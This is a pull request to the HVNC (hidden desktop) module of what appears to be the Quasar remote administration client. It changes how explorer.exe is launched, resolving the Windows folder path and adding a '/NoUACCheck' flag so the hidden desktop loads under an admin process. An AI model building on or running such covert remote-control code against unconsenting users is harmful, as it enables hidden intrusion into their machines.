### PR TITLE
Update ProcessController.cs

### DIFF
--- a/Quasar.Client/Helper/HVNC/ProcessController.cs
+++ b/Quasar.Client/Helper/HVNC/ProcessController.cs
@@ -173,7 +173,8 @@ namespace Quasar.Client.Helper.HVNC
                     }
                 }
             }
-            return this.CreateProc("C:\\Windows\\explorer.exe");
+            string explorerPath = Environment.GetFolderPath(Environment.SpecialFolder.Windows) + "\\explorer.exe /NoUACCheck";
+            return this.CreateProc(explorerPath);
         }
 
         public bool CloseProc(string filePath)


### PR DESCRIPTION
*Fix hardcoded explorer path


*Fix if the current process is admin it will launch file manager instead of loading the hvnc in the picturebox